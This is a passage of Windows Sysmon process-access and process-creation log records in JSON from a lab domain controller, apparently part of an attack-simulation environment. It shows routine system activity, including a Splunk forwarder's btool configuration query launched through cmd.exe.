C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010F0640500}\r\nTargetProcessId: 4740\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010F0640500}","TargetProcessId":"4740","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.401\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-0010AC650500}\r\nProcessId: 4716\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010F0640500}\r\nParentProcessId: 4740\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.401","ProcessGuid":"{41C8662E-1FF4-5F25-0000-0010AC650500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010F0640500}","ParentProcessId":"4740","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010F0640500}\r\nSourceProcessId: 4740\r\nSourceThreadId: 4748\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010AC650500}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010F0640500}","SourceProcessId":"4740","SourceThreadId":"4748","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AC650500}","TargetProcessId":"4716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010AC650500}\r\nTargetProcessId: 4716\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AC650500}","TargetProcessId":"4716","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3330,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3331,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3332,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3333,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.391","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3334,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.391\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 